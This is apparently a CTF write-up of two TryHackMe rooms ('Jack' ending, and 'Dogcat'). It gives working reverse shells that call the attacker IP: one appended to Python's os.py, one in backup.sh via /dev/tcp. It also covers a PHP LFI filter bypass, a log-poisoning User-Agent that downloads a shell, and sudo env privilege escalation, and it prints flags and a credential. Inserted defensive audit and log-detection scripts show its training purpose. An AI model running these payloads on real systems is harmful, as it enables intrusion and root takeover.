/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                  

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[..]

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/statuscheck/output.log                                                                                                 
/var/log/auth.log
/var/log/apache2/access.log
/var/log/syslog
/home/jack/.config/lxc/client.crt
/home/jack/.config/lxc/client.key
/home/jack/.gnupg/gpg.conf
/home/jack/.gnupg/trustdb.gpg
/home/jack/.gnupg/pubring.gpg

[..]

╔══════════╣ Analyzing SSH Files (limit 70)                                                                                 

-rw------- 1 jack jack 1675 Jan 10  2020 /home/jack/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[..]
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[..]
-----END RSA PRIVATE KEY-----

-rw-rw-r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack

I then tried to log in as both jack and root with each of those SSH keys. Root requires a password, so I wasn’t able to use that. Jack can log in with either key without a password.

Checking out his home directory I saw 1 other interesting file:

jack@jack:~$ cat reminder.txt 

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

Ok.. so I seem to be getting pointed to backups again.

I want to check out the interesting files modified in the last 5 mins. This one looks very interesting:

/opt/statuscheck/output.log

Hmm this room said hack python to gain root. I’d say this is our most likely vector:

jack@jack:~$ cd /opt/statuscheck/
jack@jack:/opt/statuscheck$ ls
checker.py  output.log
jack@jack:/opt/statuscheck$ cat output.log 

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:46:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
[..]

So that python script runs once a minute. I think we can exploit that somehow since root is running it.

Checking out that /var/backups directory:

www-data@jack:/dev/shm$ ls -al /var/backups
ls -al /var/backups
total 776
drwxr-xr-x  2 root root     4096 Jan 10  2020 .
drwxr-xr-x 14 root root     4096 Jan  9  2020 ..
-rw-r--r--  1 root root    40960 Jan  9  2020 alternatives.tar.0
-rw-r--r--  1 root root     9931 Jan  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      713 Jan  8  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root       11 Jan  8  2020 dpkg.arch.0
-rw-r--r--  1 root root       43 Jan  8  2020 dpkg.arch.1.gz
-rw-r--r--  1 root root      437 Jan  8  2020 dpkg.diversions.0
-rw-r--r--  1 root root      202 Jan  8  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      207 Jan  9  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      129 Jan  8  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root   552673 Jan  9  2020 dpkg.status.0
-rw-r--r--  1 root root   129487 Jan  8  2020 dpkg.status.1.gz
-rw-------  1 root root      802 Jan  9  2020 group.bak
-rw-------  1 root shadow    672 Jan  9  2020 gshadow.bak
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow    969 Jan  9  2020 shadow.bak

The passwd and shadow backups would be valuable, but they are readable only by root. There is also the id_rsa that Linpeas found earlier.

It seems like we can write to a lot of stuff based on the output of Linpeas. I want to check what groups we are part of:

jack@jack:/opt/statuscheck$ groups
jack adm cdrom dip plugdev lpadmin sambashare family

Now, what does that family group give us read/write access to? It seems to be the only really interesting one, as the others are common groups:

jack@jack:/opt/statuscheck$ find / -group family 2>/dev/null
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
/usr/lib/python2.7/sgmllib.pyc
[.. 200 more..]

/usr/lib/python2.7/os.py
/usr/lib/python2.7/posixpath.py
/usr/lib/python2.7/io.pyc
/usr/lib/python2.7/traceback.pyc
/usr/lib/python2.7/asyncore.py
/usr/lib/python2.7/popen2.py
/usr/lib/python2.7/zipfile.pyc
/usr/lib/python2.7/doctest.pyc
/usr/lib/python2.7/getpass.pyc
/usr/lib/python2.7/smtplib.py
/etc/python2.7/sitecustomize.py

Wow.. not good. We can actually write to ALL of these python modules. The room title makes sense now. All too easy.
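The group-writable library tree above is the whole privilege escalation, and it is also simple to detect before anyone abuses it. As an added example (not code from the original writeup), this script audits a Python library directory for modules a non-root user could modify; the sample tree it builds is constructed to mimic the box’s permissions, and the audit is told to treat the current user as root so the demo runs unprivileged.

```python
"""
Audit a Python library tree for modules a non-root user could modify.

Added example, not part of the original writeup. It models the situation on
the box: files under /usr/lib/python2.7 owned by root but group-writable by
'family', imported by a script that root runs from cron. Any such file is a
root code-execution path for every group member, so the audit flags files
that are not owned by root, are group-writable, or are world-writable.
"""
import os
import stat
import tempfile

# Only these get loaded by the interpreter; a writable README is harmless.
LOADABLE = (".py", ".pyc", ".pth", ".so")


def writable_by_non_root(path, root_uid=0):
    """Return the reasons a non-root principal could change 'path' ([] if none)."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        # A symlink in a library tree can be repointed; report it on its own.
        return ["symlink"]
    reasons = []
    if st.st_uid != root_uid:
        reasons.append("owner uid %d is not root" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable (gid %d)" % st.st_gid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_tree(top, root_uid=0):
    """Walk 'top' and return {path: [reasons]} for every risky file or directory."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(top):
        # A writable package directory lets someone drop or replace modules,
        # so directories are checked as well as files.
        reasons = writable_by_non_root(dirpath, root_uid)
        if reasons:
            findings[dirpath] = reasons
        for name in filenames:
            if not name.endswith(LOADABLE):
                continue
            path = os.path.join(dirpath, name)
            reasons = writable_by_non_root(path, root_uid)
            if reasons:
                findings[path] = reasons
    return findings


def build_demo_tree():
    """Construct a throwaway tree whose permissions mimic the box (constructed data)."""
    top = tempfile.mkdtemp(prefix="pylib-audit-")
    pkg = os.path.join(top, "site-packages")
    os.mkdir(pkg)
    os.chmod(pkg, 0o775)                    # group-writable package directory
    layout = {
        "os.py": 0o644,                     # how a stdlib file should look
        "posixpath.py": 0o664,              # group-writable, as on the box
        "sitecustomize.py": 0o666,          # world-writable
        "README.txt": 0o666,                # writable but never imported
    }
    for name, mode in layout.items():
        path = os.path.join(top, name)
        with open(path, "w") as fh:
            fh.write("# constructed sample file\n")
        os.chmod(path, mode)
    return top


def run_demo():
    """Audit the demo tree, treating the current user as root so it runs unprivileged."""
    top = build_demo_tree()
    # On a real host: audit_tree("/usr/lib/python2.7") with the default root_uid=0.
    findings = audit_tree(top, root_uid=os.getuid())
    return {os.path.relpath(p, top): r for p, r in findings.items()}


if __name__ == "__main__":
    for path, reasons in sorted(run_demo().items()):
        print("%-20s %s" % (path, "; ".join(reasons)))
```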

PrivEsc

Ok let’s grab a Python reverse shell:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

And I use this one:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.19.10.150",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I put that in the bottom of the os.py file:

try:
    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                     _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass

# -- My treacherous additions mohaha
import socket,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.19.10.150",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/sh")

I modified it so it does not import os (we are already inside os.py, which is imported above), removed the os. prefix from the dup2 calls since it is not needed there, split it up to make it readable, and finally put my own IP and port for the callback.

Next start a listener and wait:

✘ kali@kalia  ~  ~/bin/revs 4444
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.19.10.150] from (UNKNOWN) [10.10.13.248] 52586
# whoami
whoami
root
# 

NOTE: If you have trouble, you can just run python with no options as jack and it will fail citing the error and line number in the os.py file 🙂 You’re welcome. It will connect as jack once your test succeeds. Just kill that since we want root to connect back to us.

Once you get it fixed, restart your reverse listener and wait for the root shell to connect to you.

Last Flag

# whoami
whoami
root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b8b63a861cc09e853f29d8055d64bffb
# 

Anyway there we have it, we have our root shell and can get the flag.

Usernames:

jack              #wp user
wendy:changelater #wp user
danny             #wp user

Conclusion

This was a really fun room. Not your standard WordPress hack. I actually had to go through a few wordlists, which I thought was lame. NOTE to CTF creators: you don’t make a room harder by putting the password further down a wordlist or just adding the password to something obscure. I went through the entire rockyou.txt and then tried some other ones I’ve created in the past for the most common passwords, and that’s how I found wendy’s password. If anyone tries to use rockyou.txt, don’t bother, the password isn’t there.

The rest of the room was textbook – though a little harder than just Linpeas, gtfobins and done. It was still easy.

Initial Difficulty: 5/10
Overall Difficulty: 5/10
Fun Level: 8/10

Dogcat

Initial Enumeration

This is another fun room I found on Tryhackme. I have more time on the weekends to gear up for my OSCP exam so anything Medium, Hard, Insane I do on the weekends. Here we can exploit a PHP application via LFI and break out of a docker container.

This looks like an easy box. LFIs are typically easy to find and exploit.

Let’s go with a rust scan:


.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.155.23:22
Open 10.10.155.23:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-27 22:06 UTC
Initiating Ping Scan at 22:06
Scanning 10.10.155.23 [2 ports]
Completed Ping Scan at 22:06, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:06
Completed Parallel DNS resolution of 1 host. at 22:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 22:06
Scanning 10.10.155.23 [2 ports]
Discovered open port 80/tcp on 10.10.155.23
Discovered open port 22/tcp on 10.10.155.23
Completed Connect Scan at 22:06, 0.27s elapsed (2 total ports)
Nmap scan report for 10.10.155.23
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-10-27 22:06:42 UTC for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

And NMAP for good measure for details on the ports we found open, and we’ll enumerate versions while we are at it:

kali@kalia  ~/curr  nmap -sC -sV -p 22,80 $IP
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 07:08 JST
Nmap scan report for 10.10.155.23
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.20 seconds

The statement on the room seems quite evident. We should be looking at the website which is PHP and there should be some LFI.

Local File Inclusion (LFI) is when local files are passed to the include statement of PHP, in this case without being properly sanitized. So we could test this by finding pages that take filenames as parameters.

First I added dogcat.thm to my /etc/hosts file.

Next check out the website:

And the source:

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
            </div>
</body>

</html>

If we want to test some simple LFI, we can try to use something like:
http://dogcat.thm/?view=../../../../etc/passwd

We see:

So there’s something filtering there. We can try some simple fuzzing to see if we can bypass that filter.

I’ve tried a number of LFI fuzzing techniques and most of them are not working. The view parameter almost certainly has to include cat or dog (the button values) when we pass the request to the web server.

So we may be able to use the php://filter wrapper to base64-encode the file we want to see, keeping the name cat or dog in the path:
GET /?view=php://filter/convert.base64-encode/cat/resource=index HTTP/1.1

For example:

And here is a rendered view:

So let’s take that BASE64 encoded string and put it in CyberChef:

Now we can see the unencoded index file we grabbed. The interesting parts are in the php script:

<?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>

There is a line there starting with $ext which appends a .php file extension to everything we ask for. This is why we were getting an error.

We should be able to just add that ext= to the end of our query to bypass it.

So we take the result and put it in CyberChef:

This converts the base64.

Now that we know that we can bypass their filter simply by adding the ext= to the end, we don’t need our base64 though. Let’s just go back to the browser and run it like this:
../../../../etc/cat/../passwd&ext=

The reason we include cat there is because the source code says:

if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {

So the request must include dog OR cat before the file will be included.

And the source:

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        Here you go!root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    </div>
</body>

</html>

Yay! It works!

If we look here, none of the accounts in /etc/passwd have a shell. (i.e. they all say nologin) I have never seen this in real life but hey 🙂

We are going to be forced to get a php reverse shell here.

So let’s see if anything we are doing is being logged to apache logs.
If we go here:
view-source:http://dogcat.thm/?view=../../../../var/log/apache2/cat/../access.log&ext=

We look at this excerpt from the log:

This tells us that our commands are getting URL encoded, so getting a PHP reverse shell will be more difficult. However, the User-Agent, which we can control, is NOT URL encoded.

Maybe we can manipulate that to pull our php-reverse-shell and run it.

So I want to get a few things ready. We need to get a copy of the php-reverse-shell.php from Pentestmonkey and then modify the IP and port then we can host it:

 kali@kalia  ~/curr/source  cp /home/kali/scripts/php-reverse-shell.php .                      
 kali@kalia  ~/curr/source  ls                      
php-reverse-shell.php
kali@kalia  ~/curr/source  mv php-reverse-shell.php shell.php  

kali@kalia  ~/curr/source  vi
# -- make changes and save
 kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then with BurpSuite we can send a new request with the modified user agent to pull our reverse shell:

GET /?view=../../../var/log/apache2/cat/../access.log&ext= HTTP/1.1
Host: dogcat.thm
User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.18.10.150/shell.php'))?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

NOTE: Be SURE your top GET request is for the log file we are trying to poison with our modified User agent or this won’t work.
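Both request shapes used on this box leave a clear trace in the Apache access log: a view= value with traversal or a php://filter wrapper, the empty ext= that blanks the appended extension, and a User-Agent carrying a PHP open tag for the log-poisoning step. As an added example that is not part of the original writeup, this script tags those patterns in combined-format log lines; the log lines are constructed samples and the poisoned User-Agent is a harmless placeholder tag.

```python
"""
Flag LFI probes and log-poisoning attempts in Apache combined-format logs.

Added example, not code from the original writeup. It tags the request shapes
used above: a view= value with '../' traversal or a php://filter wrapper, an
empty ext= that blanks the appended extension, and a User-Agent or Referer
carrying a PHP open tag (the line that becomes code once the log is included).
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# host ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
WRAPPER = re.compile(r"^(php|data|expect|phar|zip)://", re.IGNORECASE)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def classify(line):
    """Return the tags triggered by one log line ([] if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    tags = []
    target = m.group("target")
    # parse_qs decodes one layer of percent-encoding; unquote again in case
    # the client double-encoded the traversal sequence.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get("view", []):
        decoded = unquote(value)
        if TRAVERSAL.search(decoded):
            tags.append("lfi-traversal")
        if WRAPPER.match(decoded):
            tags.append("lfi-wrapper")
    if query.get("ext") == [""]:
        tags.append("ext-bypass")
    if PHP_TAG.search(unquote(m.group("agent"))) or PHP_TAG.search(unquote(m.group("referer"))):
        tags.append("log-poison")
    # Including a log file while other LFI tags fired is the poisoning trigger.
    if tags and "/var/log/" in unquote(target):
        tags.append("log-include")
    return tags


def scan(log_text):
    """Return [(line_no, tags)] for the lines that triggered at least one tag."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits


# Constructed sample lines following the requests shown in the writeup.
SAMPLE_LOG = """\
10.18.10.150 - - [28/Oct/2023:08:30:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.18.10.150 - - [28/Oct/2023:08:31:12 +0000] "GET /?view=../../../../etc/passwd HTTP/1.1" 200 420 "-" "Mozilla/5.0"
10.18.10.150 - - [28/Oct/2023:08:32:40 +0000] "GET /?view=php://filter/convert.base64-encode/cat/resource=index HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
10.18.10.150 - - [28/Oct/2023:08:33:55 +0000] "GET /?view=../../../../etc/cat/../passwd&ext= HTTP/1.1" 200 1410 "-" "Mozilla/5.0"
10.18.10.150 - - [28/Oct/2023:08:36:37 +0000] "GET /?view=../../../var/log/apache2/cat/../access.log&ext= HTTP/1.1" 200 9000 "-" "<?php echo 'poisoned'; ?>"
"""

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print("line %d: %s" % (n, ", ".join(tags)))
```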

Next you should see the hit on your python webserver:

python3 -m http.server 80         
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

10.10.155.23 - - [28/Oct/2023 08:36:37] "GET /shell.php HTTP/1.0" 200 -

Now the malicious shell script has been successfully pulled to the target host.

Let’s start up a reverse shell listener and then activate it by visiting the URL.
http://dogcat.thm/shell.php

 kali@kalia  ~  ~/bin/revs 4444                  
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...

NOTE: In case you’re wondering what revs is, I made a script that handles the reverse shell and spits out those instructions in case you forget how to stabilize the shell. Anything to save time is good. If you want a copy, check my GitHub account.

Hit the URL:
http://dogcat.thm/shell.php

Then we can catch our shell:

 kali@kalia  ~  ~/bin/revs 4444                  
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.18.10.150] from (UNKNOWN) [10.10.155.23] 35322
Linux 4d8258e6405d 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux
 23:37:11 up  1:33,  0 users,  load average: 0.02, 0.05, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Ok, we got our shell. Let’s look around for flags:

$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ pwd
/
$ cd /var/www
$ ls
flag2_QMW7JvaY2LvK.txt
html
$ cat flag2_QMW7JvaY2LvK.txt
THM{LF1_t0_RC3_aec3fb}

There is Flag #2.

Continuing:

$ cd html 
$ ls
cat.php
cats
dog.php
dogs
flag.php
index.php
php-reverse-shell.php
shell.php
style.css
$ cat flag.php
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>

I guess we could have specified the file ‘flag’ and gotten this first flag from the Browser. Anyway, there is Flag #1.

Privesc

From here I check sudo -l to see what permissions we have for sudo:

$ sudo -l
Matching Defaults entries for www-data on 4d8258e6405d:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 4d8258e6405d:
    (root) NOPASSWD: /usr/bin/env

Well that’s an easy privesc. You can search it on gtfobins but call it like this:

$ sudo env /bin/sh

ads
/bin/sh: 2: ads: not found
whoami
root
cd /root
ls
flag3.txt
cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}

Right. There is Flag #3.

Ok at this point we have root, but there is 1 more flag. I recall seeing something about Docker on the room title. Maybe something there.

The following two commands confirm that we are indeed in a Docker container:

ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Oct 27 22:04 /.dockerenv

hostname
4d8258e6405d

So there is a very easy way to normally escape a docker container:

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cd /mnt//bin/sh: 12: docker: not found
pwd
/bin/sh: 13: cd: can't cd to /mnt/pwd

pwd
/root

Looks like we don’t have access to the docker binary to spin up a new copy of alpine.

Let’s see if we can find docker:

find / -name docker
/etc/dpkg/dpkg.cfg.d/docker
find: '/proc/16/map_files': Permission denied
find: '/proc/17/map_files': Permission denied
find: '/proc/18/map_files': Permission denied
find: '/proc/19/map_files': Permission denied
find: '/proc/20/map_files': Permission denied
find: '/proc/63/map_files': Permission denied
find: '/proc/136/map_files': Permission denied
find: '/proc/1116/map_files': Permission denied
find: '/proc/1120/map_files': Permission denied
find: '/proc/1254/map_files': Permission denied

Hmm... ok, so maybe there's another way to do this. Let me look around.

After a fair bit of prodding around, I found this:

find / -type f -mmin -2 |grep -v 'proc' | grep -v 'sys'
find: '/proc/16/map_files': Permission denied
find: '/proc/17/map_files': Permission denied
find: '/proc/18/map_files': Permission denied
find: '/proc/19/map_files': Permission denied
find: '/proc/20/map_files': Permission denied
find: '/proc/63/map_files': Permission denied
find: '/proc/136/map_files': Permission denied
find: '/proc/1116/map_files': Permission denied
find: '/proc/1120/map_files': Permission denied
find: '/proc/1254/map_files': Permission denied
find: '/proc/1593/task/1593/fdinfo/6': No such file or directory
find: '/proc/1593/fdinfo/5': No such file or directory
/opt/backups/backup.tar
/var/log/apache2/access.log

It looks like /opt/backups/backup.tar is getting recreated every minute or so.

cd /opt/backups
ls -al
total 2892
drwxr-xr-x 2 root root    4096 Apr  8  2020 .
drwxr-xr-x 1 root root    4096 Oct 27 22:04 ..
-rwxr--r-- 1 root root      69 Mar 10  2020 backup.sh
-rw-r--r-- 1 root root 2949120 Oct 28 00:14 backup.tar

There seems to be a backup script here running once a minute. I'm not sure where it's running from, since it's not in /etc/crontab and it's also not under anything in /etc/cron.daily.

ls -al
total 2892
drwxr-xr-x 2 root root    4096 Apr  8  2020 .
drwxr-xr-x 1 root root    4096 Oct 27 22:04 ..
-rwxr--r-- 1 root root      69 Mar 10  2020 backup.sh
-rw-r--r-- 1 root root 2949120 Oct 28 00:15 backup.tar

My command searched for files updated in the last 2 minutes, excluding the constantly changing system files under /proc and /sys. That check shows that the backup.tar file is indeed getting recreated once a minute. Let's check the .sh shell script:

cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

Ya, it's just a basic shell script running as root, and since we are root we can modify it.

Let’s start another reverse shell listener on our Attacking box:

 kali@kalia  ~  ~/bin/revs 4445 
Starting reverse shell on port 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4445 ...

Now we can change that .sh script file to send us a reverse shell.
This is the way I did it:

cp backup.sh backup.sh.old
ls
backup.sh
backup.sh.old
backup.tar
echo "#!/bin/bash" > backup.sh
echo "bash -i >& /dev/tcp/10.18.10.150/4445 0>&1" >> backup.sh
cat backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.18.10.150/4445 0>&1

Oddly, I tried this without the initial echo of bash's shebang but it wouldn't work. I did it this way and it was fine. Notice the first redirect is a single >, which truncates the file and writes to it. The second time I use a double >>, which appends the reverse shell line to the file.

And then we wait..

kali@kalia  ~  ~/bin/revs 4445 
Starting reverse shell on port 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4445 ...
connect to [10.18.10.150] from (UNKNOWN) [10.10.155.23] 51844
bash: cannot set terminal process group (8817): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# 

Now we have a root shell on the machine itself.

root@dogcat:~# ls
